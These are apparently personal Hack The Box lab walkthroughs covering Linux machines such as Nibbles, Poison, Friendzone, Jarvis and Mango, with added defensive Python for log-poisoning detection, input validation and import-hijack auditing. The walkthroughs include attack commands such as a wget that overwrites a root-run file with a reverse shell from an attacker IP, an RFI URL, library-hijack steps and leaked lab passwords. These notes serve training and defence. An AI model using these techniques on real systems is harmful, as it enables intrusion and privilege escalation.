HTB : Linux
Sense
Enumeration , Open-source exploit
Directory enumeration leads to credentials , with which we are able to log in to the website
Open exploit leads to command-injection , giving direct access to root
Nibbles
Initial ⇒ view-page-source , Directory Enumeration , Open-exploit
Privesc ⇒ sudo -l , ------------------------------
nmap gives 22,80 . On port 80 a static html page is running , however view-page-source leads to an interesting comment which discloses the directory /nibbleblog
Gobuster on http://$ip/nibbleblog gives :
admin.php : login page
README : version disclosed , nibbleblog v4.0.3
/content : /content/private/users.xml ⇒ leaks username admin
Open-exploit available (Code Execution) ⇒ https://github.com/dix0nym/CVE-2015-6967
Inside the shell , doing sudo -l gives /home/nibbler/personal/stuff/monitor.sh
Node
------------------
Viewing the website (3000) gives some usernames , and checking app.js using Dev-Tools leaks the usernames & hashes. Using these creds on the same website leads to authentication as the admin user , from where I can download the backup file. Decoding file.backup with base64 ⇒ file.zip , unzipping it gives a hash ⇒ cracking the hash gives SSH creds for user mark
ps -auxx gives 2 files running as user tom
Solidstate
Initial ⇒ rsip , pop3
Privesc ⇒ pspy32 , script-modification
Exploiting rsip (4555) with default credentials leads to user enumeration and password change. Using those usernames with the changed password on pop3 (110) leaks SSH creds in user mindy's mail. Getting a shell as mindy & running pspy32 gives a script /opt/tmp.py running as root. Modifying the script and putting a reverse shell in it gives us the shell as root.
Valentine
Initial ⇒ Directory Enumeration , Hexadecimal dump (xxd) , SSH passphrase crack
Privesc way 1 ⇒ history + tmux || Privesc way 2 ⇒ dirtycow
Nmap gives 22,80,443 & --script vuln states 443 is vulnerable to the heartbleed vuln. Interesting Dir-enum findings :
/dev/hype_key which contains hexadecimal ; xxd -r -p gives the ssh private key & for the passphrase we can decrypt it via openssl
For privesc we have 2 paths :
tmux
dirtycow
ps -pf gives tmux is running & the history command gives the tmux socket path ; tmux -S /.dev/dev_sess ⇒ running this gives root
uname -a gives version 2012 , searchsploit gives the dirtycow exploit for this version ; gcc -pthread dc.c -o c -lcrypt && chmod +x c && ./c ⇒ gives a username random
su random ⇒ gives root
Poison
Initial ⇒ Enumeration , Log-poisoning || phpinfolfi.py || SSH
Privesc ⇒ Process check , internal network scan , port forwarding
Nmap gives 22,80 . On port 80 a website is running which allows reading local php files , and which is also vulnerable to LFI
pwdbackup.txt ⇒ gives base64 encoded pass
/etc/passwd ⇒ gives username charix
phpinfo ⇒ file_upload is on (but not able to find either the functionality or the upload dir)
1st way is doing ssh as charix , password = Charix!2#4%6&8(0
2nd way of exploitation is log poisoning
3rd way is using the phpinfolfi exploit {payloads all the things}
ps -auxw gives vnc is running & doing netstat -anlp gives ports 5801 , 5901. After SSH tunneling , accessing port 5901 gives me a shell session as the root user
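The log-poisoning chain above has two detectable halves: a PHP open tag landing in a client-controlled log field, and a later request reading that log back through the LFI parameter. The following detector is an added example written for this write-up, not code from the box; the log lines and the view.php endpoint are constructed.

```python
import re

# Added detection example for the log-poisoning + LFI chain; the log lines
# below are constructed for this example and are not from the box.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2020:10:00:00 +0000] "GET /view.php?file=index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Jan/2020:10:00:05 +0000] "GET / HTTP/1.1" 200 1024 "-" "<?php echo 'poisoned'; ?>"
10.10.14.5 - - [01/Jan/2020:10:00:09 +0000] "GET /view.php?file=../../../../var/log/httpd-access.log HTTP/1.1" 200 9000 "-" "curl/7.68"
"""

# Apache/nginx "combined" format; referer and user-agent are the last two quoted fields.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A PHP open tag in any client-controlled field is the poisoning step.
PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
# Traversal or a direct log/proc path in the request line is the read-back step.
LOG_READ = re.compile(r"(?:\.\./|/var/log/|/proc/self/)")


def classify(line: str):
    """Return a tuple of reasons for one log line (empty if nothing is suspicious)."""
    m = COMBINED.match(line)
    if not m:
        return ("unparsable",)
    reasons = []
    for field in ("req", "ref", "ua"):
        if PHP_TAG.search(m.group(field)):
            reasons.append(f"php-tag:{field}")
    if LOG_READ.search(m.group("req")):
        reasons.append("lfi-path:req")
    return tuple(reasons)


def scan_log(text: str):
    """Return (line_number, client_ip, reasons) for every suspicious line."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        reasons = classify(line)
        if reasons:
            m = COMBINED.match(line)
            ip = m.group("ip") if m else "?"
            hits.append((number, ip, reasons))
    return hits


if __name__ == "__main__":
    for number, ip, reasons in scan_log(SAMPLE_LOG):
        print(f"line {number} from {ip}: {', '.join(reasons)}")
```

The two hits together (a poisoned field from an address, then a traversal request from the same address) are the pair worth alerting on, rather than either one alone.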
Sunday
Initial ⇒ Finger (79) brute force
Privesc ⇒ Enumeration , sudo -l , wget , overwriting file/binary
Nmap gives the following result :
79 : finger ⇒ nmap result discloses the usernames sunny & sammy
111 : rpcbind
22022 : SSH
Brute forcing fingers users using exploit :-
http://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz
Same as nmap , interesting usernames found : sammy & sunny. Guessing the password sunday and doing SSH gives the shell.
In the root location (/) there is an unusual directory /backup which contains a shadow.backup file , which is basically a backup file for /etc/shadow ; reading it gives hashes for both users sammy & sunny.
Doing sudo -l for both users gives :
sammy : wget ⇒ we can read files , upload files
sunny : /root/troll ⇒ we can run it as sudo (nothing extra than this)
Combining both , we can overwrite /root/troll using wget with our python reverse shell
sudo wget http://10.10.14.5/shell.py -O /root/troll
Tartarsauce
Initial ⇒ Recon , Dirsearch , wpscan , manual check of wordpress plugins
Privesc ⇒ ----------------------
Only port 80 is open ⇒ static website , dir-enum gives /webservices , still nothing useful
Dir-enum inside /webservices , gives /wp ⇒ site is using wordpress
wpscan enumeration found nothing vulnerable , 3 plugins found :
Manually checking the README of the plugins gives something interesting
So basically , the real version is 1.5.3 , some recon gives that one of the plugins , gwolle-gb , is vulnerable on this version.
RFI in gwolle-gb v1.5.3 by visiting the link : http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://ip/path
start a python server , put a php reverse shell , rename it to wp-load.php , curl it ⇒ shell
Irked
Initial ⇒ IRC (6697) , open-exploit
Privesc level 1 ⇒ Enumeration + steg pass cracking
Privesc level 2 ⇒ script modification
80 ⇒ an emoji is on the website , nothing else
6697 ⇒ irc running , googling it gives an open-exploit , which gives a shell as user ircd
In /home/djmardov/Documents found a .backup file , which has the steg password. wget the image , crack it using the steg pass and we get a new pass which works on both ssh & su
Got shell as djmardov , running linpeas.sh gives an unusual binary /usr/bin/viewuser , executing it gives this error :
create an executable with the same name , insert a rev shell , run viewuser ⇒ shell as root
Friendzone
Initial ⇒ Recon , combining file-upload via SMB & execution LFI
Privesc level 1 ⇒ recon , mysql creds
Privesc level 2 ⇒ Python Library Hijacking , script modification
Nmap & recon are as follows :
139/445 ⇒ SMB recon , with anonymous login gives :
//10.10.10.123/Development ⇒ read & write access
//10.10.10.123/general ⇒ creds.txt
80 ⇒ discloses domain name friendzone.red
53 ⇒ DNS recon gives some subdomain names , useful : administrator1.friendzone.red
administrator1.friendzone.red ⇒ Login page (creds from smb work here)
On administrator1.friendzone.red there are 2 parameters image_id & timestamp ; timestamp is vulnerable to LFI. Put a php rev-shell in ../../../etc/development using smb and accessing it gives a shell as www-data.
In /var/www/mysql_data.conf , db_user & db_pass are available which work for ssh & su.
After getting a shell as user friend , running pspy shows a python script running as root : /opt/server_admin/reporter.py , on some line there is import os. In /usr/lib/python2.7 there is os.py which is writable ; insert a rev shell in os.py , start a listener , got shell as root
Swagshop
Networked
Initial ⇒ File upload with double extension & exiftool to manipulate magic-bytes
Privesc level 1 ⇒ Recon in /home dir , cron files , Input manipulation
Privesc level 2 ⇒ sudo -l , Input manipulation in shell script
Recon & Enumeration
port scan
directory scan
http://friendzone.red
Just a basic web page , nothing here. But there is an " Email us at: info@friendzoneportal.red " , we can use "friendzoneportal.red" for further enumeration
https://friendzone.red
just a gif , nothing informational
/wordpress
Forbidden <not-useful>
Samba Enumeration
I tried listing files & anonymous login ....... and succeeded , there is a file "creds.txt" present in the "general" directory , I got credentials for the admin user. I tried them in ssh , ftp .... and failed. Let's enumerate samba more
and after the recon , I get to know the path of all directories and files in samba , I will focus on those directories which are beneficial for me
DNS Zone Transfer
Listing all domains for both "friendzone.red" & "friendzoneportal.red" and then adding all the domains to the /etc/hosts file
At first I opened all domains with http .... but they return the same page which I found on port 80. Then I opened all of them with https:// , and I got a lot of domains which are working , but there are 2 domains through which I solved the box :
https://administrator1.friendzone.red/ >> login page
https://uploads.friendzone.red/ >> has upload functionality
I first tried incorrect creds and got the response "wrong" , then I used the creds found in samba and got logged in , and the page says "login success please visit dashboard.php"
/dashboard.php
the page says visit "image_id=a.jpg&pagename=timestamp" , and in response I get a picture and a timestamp number , I think it's vulnerable to LFI
I uploaded a php shell on this , and it's successfully uploaded , time for LFI , I already have 2 parameters :-
LFI
/dashboard.php?image_id=a.jpg&pagename=timestamp
LFI in image_id
I changed the value a.jpg => shell.php but no reverse shell , then I tried again and again , but didn't get anything ..... that's weird
directory scan
/images there are only 2 images here , a.jpg and b.jpg , it means my shell was not uploaded here , maybe there is another directory where my shell is uploaded
LFI in pagename
then the only option left is this , let's change the value with the directories and file names found in the scan : timestamp > response shows the timestamp number ; login > response shows "wrong". I guess it's reflecting the content of the page-name inserted here , I think it's vulnerable to LFI. To be sure I am going to request the "php source code file" payload :-
shell as www-data
After reading the source-code of dashboard , I get to know that the parameter "pagename" is taking the value and adding a ".php" after the value and then shows the content of that particular file. I tried pagename=../../../../etc/passwd and failed , =/etc/passwd still failed , I think it's because it's adding a ".php" extension at the end of the file. But after samba enumeration , we know the "Development" & "general" directories are present in the "/etc/" directory. Let's make an echo.php file and put it into one of the smb-directories and then try to read it. Unfortunately we don't have write permission in "general" , the only option left is "Development"
NOTE :- I did not add echo.php in the payload , as I already know that the script does it itself. Both payloads are working fine , time to upload a reverse shell and BOOM....... we got the shell
privesc www-data => friends
found a mysql config file in the /var/www directory , inside it I got the credentials for user "friend"
we can do both ssh as well as switch user to get a shell as "friend"
privesc friend => root
pspy
after running the script , I found a cronjob which is running a python script :- /opt/server_admin/reporter.py. There is nothing much in the script but it was importing the os library , so then I started searching for "os.py" , in order to perform python library hijacking. I found os.py and it is also writable .... great , let's insert a reverse shell at the bottom of the script "os.py". NOTE :- I removed the "os" keyword from the reverse shell as we are already injecting the payload in os.py. Original payload :-
Modified payload :-
after injecting I waited for a few minutes to let the cronjob do its work , and after some time BOOM....... we got the shell as root.
Jarvis
Initial 1 ⇒ SQL-injection , Extracting PHPmyadmin creds , php shell upload
Initial 2 ⇒ Direct web-shell upload using SQL-injection
Privesc level 1 ⇒ sudo -l , command injection in python script
Privesc level 2 ⇒ linenum.sh , SUID , /bin/systemctl , fake service exploitation
nmap
port open :- 22 , 80 , 64999
gobuster
directories found :-
server-status/ , phpmyadmin/ , room.php
website (80)
There is a website running on 80 , which has some functionality to check rooms (price , description , room name , rating .... etc) and it seems exploitable through sql injection , let's try .... , but before that
/phpmyadmin/
There is a phpmyadmin login page running on the website. Although I already tried the default credentials , I didn't get anything , we need credentials for that
website (64999)
Nothing over here , just some text "you have been blocked for xxx seconds , don't be bad"
shell as www-data
way 1 - shell upload via phpmyadmin
we are logged in. After looking at the application I get to know the application version which is :- "phpmyadmin 4.8.0". Let's look for any public exploit available for this :- " searchsploit phpmyadmin | grep '4.8' " & we got 2 exploits for that. According to the payload we are able to do LFI and also LFI to RCE , for that we have to first run a sql query and then we have to visit the url including the session id. 1st let's copy the session id => "phpmyadmin" cookie. 2nd run the sql query
3rd visit the link including the session id and command in "cmd" parameter
4th inject reverse shell in "cmd" parameter
way 2 - Direct shell upload
As we know we can write a file using sql injection & the webpage directory is /var/www/html , let's try uploading a reverse shell. payload :-
let's visit the page and try the command injection http://10.10.10.143/rev.php?cmd=whoami , it works , let's add the reverse shell command
privesc www-data => pepper
sudo -l
I got a file "/var/www/Admin-utilities/simpler.py" which I can run with sudo (pepper) privileges , first let's read "simpler.py". Basically the script is used for :
-h help
-l list attackers' ip addresses
-s check attack status
-p ping an ip address
Here in "-p" the exec() function is called , which executes the ping command , we can use command injection in this but there is a list of forbidden characters :- ` , - , | , || , ~ , & , && , ;
Note :- we can still run $(command) to do a command injection in the script
I got the shell as pepper , but it's not fully functional as the commands are running , but the result is getting on screen. To fix this , I first created a shell script (shell.sh) in the /tmp directory and put a reverse shell in that and then did the command injection in "simpler.py" in order to execute my reverse shell script
And BOOM we got the shell as pepper
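The forbidden-character list above is a denylist, and the $(command) bypass the write-up notes is the classic consequence. As an added illustration (not the box's own simpler.py), here is a denylist check of that shape beside a hardened version that validates the argument as an IP address and runs ping without a shell.

```python
import ipaddress
import subprocess

# Constructed to mirror the forbidden-character list the write-up quotes;
# this is an added illustration, not the box's own simpler.py.
FORBIDDEN = ("`", "-", "|", "||", "~", "&", "&&", ";")


def denylist_allows(arg: str) -> bool:
    """The denylist approach: reject only the listed tokens.

    It lets `$(...)` through, which is exactly why the write-up still gets
    command injection, and it also blocks legitimate input such as "-c".
    """
    return not any(token in arg for token in FORBIDDEN)


def validate_ip(arg: str) -> str:
    """The allowlist approach: accept only a syntactically valid IP address.

    Anything else, including shell substitutions and option-like values,
    raises ValueError and never reaches a shell.
    """
    try:
        return str(ipaddress.ip_address(arg.strip()))
    except ValueError as exc:
        raise ValueError(f"refusing non-IP argument: {arg!r}") from exc


def ping_hardened(target: str, count: int = 1, run=subprocess.run) -> int:
    """Ping `target` with argv passed as a list so no shell ever parses it.

    `run` is injectable so the call can be checked without sending packets.
    Returns the command's exit status.
    """
    ip = validate_ip(target)
    completed = run(["ping", "-c", str(count), ip], capture_output=True, text=True)
    return completed.returncode


if __name__ == "__main__":
    for sample in ("10.10.10.143", "$(id)", "10.10.10.143;id"):
        try:
            verdict = "accepted " + validate_ip(sample)
        except ValueError as err:
            verdict = str(err)
        print(f"{sample!r}: denylist allows={denylist_allows(sample)}, allowlist: {verdict}")
```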
privesc pepper => root
run linenum.sh
after running the script , we get a binary which both pepper and root can run => "/bin/systemctl". systemctl is a systemd utility which is responsible for controlling the systemd system and service manager , that is , it creates and manages services. Let's create a malicious service and run it using systemctl and BOOM....... we got the shell as root.
Mirai
Popcorn
Initial ⇒ PHPinfo , File-Upload
Privesc ⇒ Kernel Exploit , 1 ⇒ Full-Nelson.c || 2 ⇒ Dirty-Cow
Website and SSH are open , directory enum gives 2 interesting dirs :- /test & /torrent
/test ⇒ Shows phpinfo page ( file upload is enabled)
/torrent ⇒ Login & Sign-Up page is running
After creating a user and signing in I got an upload form , which accepts only torrent files , nothing else. (php webshell not allowed)
After uploading .torrent file , we get another upload functionality for screenshot
uploading a php-webshell gives success & the response discloses the upload path /torrent/upload/
Navigating to the path , we see our webshell , triggering it gives a reverse shell
uname -a / uname -r gives the vulnerable linux version 2.6.37 , uploading and executing any exploit gives us root.
Full-Nelson.c ⇒ https://www.exploit-db.com/exploits/15704
DirtyCow
Haircut
Initial ⇒ RFI (curl) ⇒ PHP shell ⇒ RCE
Privesc ⇒ Find command , Screen-4.5.0 , pwnkit
On the website , able to perform RFI on Local/Remote Host (as curl is running in the background).
Used RFI to upload a php webshell , which can be triggered from site/uploads.
Got shell as www-data , for privesc used pwnkit which leads to root
Alternate privesc ⇒ screen-4.5.0
Blocky
Initial ⇒ wordpress scan , directory enumeration
Privesc ⇒ sudo -l , sudo su -
Recon & Enum
port scan
directory scan
wordpress scan
nothing interesting over here
website
there is nothing much on the website , but if you click on the post (the only post available on the web page) you find the username "notch"

I found 2 jar files over here , then I used jd-gui to discover the content
blockycore.jar
I found the root password in this file

shell as notch
now we have 2 usernames :- notch & root and 1 password :- 8YsqfCTnvxAUeduzjNSXe22. I tried notch with the password and it worked , I got the shell
privesc notch => root
Frolic
Initial ⇒ Enumeration , Encrypt/Decrypt , open-source exploit RCE in playsms
Privesc ⇒ Buffer overflow x-x-x-x SKIPPING x-x-x-x
recon & Enum
port scan
http pages on port 1880 & 9999
smb enumeration
nothing interesting over here
directory scan
http://10.10.10.111:1880
http://10.10.10.111:9999
nginx server default page is running on it and it also discloses the domain name :- http://forlic.htb
Node-red login page is running on it , I need creds for that
we got php-info , after checking a little I got this :- allow_url_include Off , this means LFI is not possible
I got 2 files & 1 directory : user.txt = admin , pass.txt = imnothuman , loop = nill. I tried these creds on the node-red login page but it failed
another login page , but when I try to intercept the request I got nothing , in the source code I got a file :- login.js. This file was also found by feroxbuster & it contains creds for this page :- username = admin , password = superduperlooperpassword_lol
after successful login we got redirected to :- http://10.10.10.111:9999/admin/success.html and this page contains an encoded string
after googling a little , I get to know it's the Ook language , when I decoded it I got a base64 string
I decoded it with base64 and saved it as a new file and then ran the file command on this file and I got to know that it's a zip file , so I saved it as file.zip and tried to unzip it , but it needs a password , then I ran fcrackzip on it and got the password = password. After unzipping it I got a file index.php which contains hex. After doing hex to text I got another base64 string , so another base64 decode is required , and then another Ook decode is required :-
Finally we got the password , but it's not working for the Node-Red login page , but it did work for the playsms page. We got in. After doing searchsploit I found an exploit which does work on playsms to get RCE
shell as www-data
create a csv file and add the payload to it
upload it and intercept the request in burp & change the user-agent to the command which I want to execute , e.g. whoami

enter the reverse shell in the user-agent
and we get the shell as www-data
shell as root
it requires a buffer overflow , so I skipped it
Postman
Initial ⇒ Redis , SSH-key upload
Privesc ⇒ ----------
Recon & Enumeration
port scan
directory scan
for http://10.10.10.160/
website (80)
Nothing interesting over here , just a static web page with no functionality
https://10.10.10.160:10000
There is a login page powered by "WEBMIN" , by default webmin doesn't have any default credentials. I also tried sql & nosql injection ...... no benefit , we will look back here after a while
/upload
just a bunch of images , almost none of them open or have something interesting .... I moved on
redis 6379
we can connect to redis just using net-cat , and we can execute commands
shell as redis
I created an ssh pub-pri key pair and then I used the redis server to import and save the key in authorized keys , after that just ssh into the system as the redis user and we got the shell. Importing the ssh key :-
Saving ssh key in authorized keys :-
privesc redis => Matt
linpeas.sh
I found a SSH RSA private key for the Matt user , so I first used it for direct ssh login ...... didn't work. Next , I extracted the key contents (hash) by using ssh2john , we can also extract that online. After extracting the hash from the key , we need to crack it , for this I used john
I used the key and password and ........ I still failed , so I tried "su - Matt" in the shell I already had and I succeeded ...... got the shell as Matt
privesc Matt => root
These credentials also work for the webpage we found earlier , we kind of need a metasploit payload to do that , so I just skip it
Mango
Initial ⇒ No-SQL-injection , Enumerating database & finding credentials
Privesc ⇒ linpeas.sh , Binary exploitation (jjs)
port scan
ports 22 , 80 , 443 are open. script scan :- gives us the name of the domain running on port 80 , domain name :- staging-order.mango.htb
website (80)
the page returns 403 <forbidden> on the ip address , I think we have to add the host in /etc/hosts before we access this page. yes ..... now it's working , with an admin panel on it
directory scan
I did 2 directory scans , one for <http://staging-order.mango.htb> & the other for <https://10.10.10.162>
I found some php and json files in this directory and I find this particular json file useful
After reading the file I get to know that the application is using MongoDB on the server side ...... this gives a shot to test Nosql injection
No-sql injection
shell as mango
I used a payload to bypass the authentication , but there is nothing inside ....... I need credentials , so as we are dealing with nosql we can use some payload or script in order to retrieve data. I used a script but here are also some manual payloads :-
I got credentials , now let's try ssh. I tried the admin creds first but failed , so I tried the mango creds and BOOM...... we are in
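The bypass above works because operator syntax in the form body reaches the database query unchanged. As an added defensive example (not the box's login code), this is a parser that accepts only two plain-string fields and a query builder that treats the username as a literal; the field names and the form encoding are assumptions.

```python
from urllib.parse import parse_qsl

# Added defensive example, not the box's login code. It models the fix for the
# authentication bypass described above: a form body such as
# "username[$ne]=x&password[$ne]=x" must never turn into a query operator.


class InvalidLoginInput(ValueError):
    """Raised for any login body that is not exactly two plain strings."""


def _plain_string(field: str, value: str, max_len: int = 128) -> str:
    if not isinstance(value, str) or not value or len(value) > max_len:
        raise InvalidLoginInput(f"{field}: expected a non-empty string of at most {max_len} chars")
    if "\x00" in value:
        raise InvalidLoginInput(f"{field}: NUL byte not allowed")
    return value


def parse_login(raw_body: str) -> dict:
    """Parse an x-www-form-urlencoded login body into {"username", "password"}.

    Keys are matched exactly, so "username[$ne]" (the array syntax that some
    frameworks decode into a nested document, i.e. a MongoDB operator) is
    rejected instead of being nested.
    """
    fields = {}
    for key, value in parse_qsl(raw_body, keep_blank_values=True):
        if key not in ("username", "password"):
            raise InvalidLoginInput(f"unexpected field {key!r}")
        if key in fields:
            raise InvalidLoginInput(f"duplicate field {key!r}")
        fields[key] = _plain_string(key, value)
    if set(fields) != {"username", "password"}:
        raise InvalidLoginInput("username and password are both required")
    return fields


def build_user_lookup(creds: dict) -> dict:
    """Build the MongoDB filter for the user record.

    Only the username goes into the query, wrapped in an explicit $eq so the
    driver treats it as a literal; the password is verified in application
    code against the stored hash, never compared inside the query.
    """
    return {"username": {"$eq": creds["username"]}}


if __name__ == "__main__":
    for body in ("username=admin&password=secret", "username[$ne]=x&password[$ne]=x"):
        try:
            print(body, "->", build_user_lookup(parse_login(body)))
        except InvalidLoginInput as err:
            print(body, "-> rejected:", err)
```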
privesc mango => admin
and enter password we found using nosql injection
privesc admin => root
linenum.sh
I found a binary named "jjs" in the path "/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs" with SUID. Let's do some searching , and I found something on GTFObins , it's a java binary which can be used for : file read , file write , reverse shell and some more functionalities ...... I first tried the reverse shell , but I get the shell again as the admin user , but I need it as the root user. Next I tried file read , but it wouldn't work for me , now the only option left for me is to write a file , so I decided to write an ssh key using jjs , so I came back to my machine :-
I named the file "mango" and I got 1 private key "mango" & 1 public key "mango.pub". We use the public key to write it in the target machine and the private key to login , so I copied the "mango.pub" content and pasted it inside the jjs file-write payload & directory = /root/.ssh/authorized_keys. Login using the private rsa key
Traverexec
Openadmin
Magic
Initial ⇒ Auth bypass via sql-inj OR Match-&-Replace 302 to 200 (EAR) + file upload
Privesc level 1 ⇒ Database creds in /var/www/magic + Data dump using mysqldump
Privesc level 2 ⇒ -----------------------
Recon & Enum
port scan
directory scan
website
there is a bunch of images on the web page and there is also login functionality in the bottom left corner of the web page

http://10.10.10.185/login.php
This can be bypassed using a sql authentication attack , after getting logged in we get redirected to /upload.php which has a file upload vulnerability
http://10.10.10.185/upload.php
if we directly visit this page it redirects us to /login.php , but when intercepting the response in burp and checking the page content and page size it shows the same page. To bypass this use burp - match and replace from 302 found -> 200 ok

shell as www-data
file upload exploitation
we can use 2 methods to exploit this vulnerability :-
1. using exiftool to inject a reverse shell into the image we are uploading
2. injecting the payload in the middle of the image file content
I used the second , and got the shell
privesc www-data => theseus
after getting the shell , I found 1 more file inside the /var/www/magic directory
db.php5
This is a mysql file , after reading the file we get to know the mysql credentials for user theseus , but unfortunately mysql is not present on the machine , but there is mysqldump present , we can use this
after the dump , we got the result. Inside the result I found this which I think is interesting
I used the su command with creds username = theseus & pass = Th3s3usW4sK1ng , and got the shell
privesc theseus => root
linenum.sh
found an unknown binary > /bin/sysinfo , and it is also executable as root
Admirer
Initial ⇒ SSRF to My-SQL fake server (attacker server)
Privesc ⇒ Path Hijacking (PYTHONPATH) , Scripting Library (shutil.py) & function
Nmap gives 21,22,80 open with a disallow entry admin-dir in robots.txt
Recon on http://$ip/admin-dir gives 2 .txt files
contacts.txt ⇒ Holds email-address & username (NO USE)
credentials.txt ⇒ Holds FTP username & password
Logging in & enumerating it gives us files :
dump.sql ⇒ (Nothing interesting except Database Name : admirerdb )
html.tar.gz ⇒ extracting it gives some directories and files , interesting one :
/utility-scripts
/utility-scripts/dbadmin.php (Holds username waldo , password & database)
Enumerating http://$ip/utility-scripts gives adminer.php , which has mysql connect running on it , {tried the creds I found , but didn't work}
Using the server field , we can also connect to a remote server , I set up mysql on my attacking machine and set user/pass , logging in to it gives access. After getting inside , I loaded the local file and viewing it gives me other creds for waldo which work for SSH
Inside the SSH session , doing sudo -l gives a file : /opt/scripts/admin_task.sh for which SETENV is available , reading it gives that on function 6 it runs a script /opt/scripts/backup.py ; backup.py is importing make_archive from the shutil library
Creating a shutil.py file/library inside the /tmp directory and injecting a reverse shell in it.
Exploiting using the sudo right on the path-variable (SETENV) and also on /opt/scripts/admin_task.sh
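Both the os.py hijack in Friendzone and the shutil.py hijack here come down to the same two conditions: a module file that non-owners can write, or a writable directory searched ahead of the real module. The following audit is an added example (not a script from either box) that checks those conditions over an import search path; the fixture directory it builds is constructed so the check runs offline.

```python
import os
import stat
import sys
import tempfile

# Added defensive audit, not a script from either box. It checks the two
# conditions behind the os.py (Friendzone) and shutil.py (Admirer) hijacks:
# a module file that non-owners can write, and a writable directory that is
# searched before the real module (for example one injected via PYTHONPATH).

GROUP_OR_OTHER_WRITE = stat.S_IWGRP | stat.S_IWOTH


def writable_by_others(path: str) -> bool:
    """True if the group or world write bit is set on `path`."""
    return bool(os.stat(path).st_mode & GROUP_OR_OTHER_WRITE)


def search_path_with_env(base_path, pythonpath: str = ""):
    """Prepend PYTHONPATH entries the way the interpreter does; a sudo rule
    with SETENV lets the invoking user choose this value."""
    extra = [p for p in pythonpath.split(os.pathsep) if p]
    return extra + list(base_path)


def audit_imports(module_names, search_path=None):
    """Return (module, path, reason) findings for each imported module name.

    Directories are walked in import order. A writable directory seen before
    the module is found is reported as "writable-dir"; a writable module file
    is reported as "writable-file". The first match shadows later directories,
    so they are not inspected.
    """
    if search_path is None:
        search_path = [p for p in sys.path if p]
    findings = []
    for name in module_names:
        for directory in search_path:
            if not os.path.isdir(directory):
                continue
            candidate = os.path.join(directory, name + ".py")
            if os.path.isfile(candidate):
                if writable_by_others(candidate):
                    findings.append((name, candidate, "writable-file"))
                break
            if writable_by_others(directory):
                findings.append((name, directory, "writable-dir"))
    return findings


def build_fixture():
    """Create a constructed layout under a temp dir: a library directory with
    a group/world-writable os.py and a sane shutil.py, plus a 0777 directory
    standing in for /tmp. Returns (lib_dir, tmp_dir)."""
    root = tempfile.mkdtemp(prefix="pyaudit-")
    lib = os.path.join(root, "lib")
    os.mkdir(lib)
    os.chmod(lib, 0o755)
    for module, mode in (("os", 0o666), ("shutil", 0o644)):
        path = os.path.join(lib, module + ".py")
        with open(path, "w") as fh:
            fh.write("# constructed stand-in module\n")
        os.chmod(path, mode)
    tmp = os.path.join(root, "tmp")
    os.mkdir(tmp)
    os.chmod(tmp, 0o777)
    return lib, tmp


def run_demo():
    """Return the (module, reason) pairs found for the fixture, first with the
    library directory alone and then with a PYTHONPATH pointing at the
    writable directory in front of it."""
    lib, tmp = build_fixture()
    plain = [(name, reason) for name, _, reason in audit_imports(["os", "shutil"], [lib])]
    env = search_path_with_env([lib], pythonpath=tmp)
    hijackable = [(name, reason) for name, _, reason in audit_imports(["shutil"], env)]
    return plain, hijackable


if __name__ == "__main__":
    print(run_demo())
```

Run with no arguments against the real interpreter (audit_imports(["os", "shutil"])) to check the system's own sys.path for the same conditions.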
Blunder
Tabby
Doctor
Initial ⇒ via SSTI or via Command Injection
Privesc level 1 ⇒ Password in /var/log/apache2/.backup
Privesc level 2 ⇒ -------------------------
Recon & Enum
port scan
directory scan (http://10.10.10.209)
directory scan (http://doctors.htb)
website (http://10.10.10.209)
I found nothing useful here , but I did find a mail address - info.doctors.htb , let's add it to /etc/hosts and check
website (http://doctors.htb)
we got a login page and also a sign up functionality , let's create an account on this. After getting in we get a message functionality which consists of 2 parameters

after posting a message it looks like this :-

shell as web
Both parameters are vulnerable. para 1 is vulnerable to SSTI & XSS , para 2 is vulnerable to command injection
SSTI
I injected payloads , but none of them were working until I checked the /archive. 9x9 didn't give any result , I don't think it's vulnerable to SSTI , but 8x8 worked for me


it's working , let's take a reverse shell


I thought it didn't work , but no , we have to send the request in /archive as well , after hitting send from /archive I got this as response and a reverse shell as well

command injection
I started testing it by injecting my ip , but it gave an error

trying the $IFS payload and it worked :-

after that I just ran bash /dev/shm/exploit , and I get the reverse shell
privesc web => shaun
and i found this :-
I tried su - with username = shaun & password = Guitar123 , and I got the shell
privesc shaun => root
Sneakymailer
Initial ⇒ Recon , Phishing , -----
Privesc ⇒ ----
Recon & Enum
port scan
nmap gives domain name = http://sneakycorp.htb
directory scan
subdomain scan
website
the page consists of names and emails , nothing more. I can download all the email addresses of the users
register page , but no redirection or action is performed
shell as www-data
phishing users
I will try to send a phishing mail containing my ip address in the message body , and I open a python server on my machine. If any user clicks on my ip address I will get a call back
I did get a call back on the python server , now I will open nc to check what I get
I got creds for paul
Passage
Lunanne
Time
Initial ⇒ Recon , Open-Exploit (com.fasterxml.jackson.databind)
Privesc ⇒ Linpeas.sh , ----
Recon & Enum
Port scan
Directory scan
WEB (80)
There is a json beautifier & validator working on the website , after testing it , I get to know that the beautifier is of no use for us , so the only thing left is the validator. Basically if we input json data in it , it validates it and gives a response accordingly , but if we input normal data then it will give us an error :-
After googling and reading walk-throughs , I found that this is CVE-2019-12384
Shell as pericles
there is a public exploit available on github , through which we can perform SSRF to RCE. Steps to reproduce :-
1. clone the git repository on your machine
2. open and edit the sql file and enter the command you want to get executed on the target machine/server , in my case it's a reverse shell
3. start a http server on your local machine
4. edit the payload accordingly :- ip address , port no. , sql file name
5. replace all the "\" with " " (blank space) using the echo command :-
final payload :-
Turn on the netcat listener on your machine , and BOOM.......... we got the shell
privesc pericles => root
Ready
Initial ⇒ SSRF -> redis RCE (open-exploit)
Privesc ⇒ Backup file in /opt
On port 5080 a website is running gitlab , enumeration gives us the outdated version (11.4.7)
Open Exploit available , for an explanation of the vulnerability refer
For privesc , found password : wW59U!ZKMbG9+*#h in the gitlab.rb file located in /opt/backup
Delivery
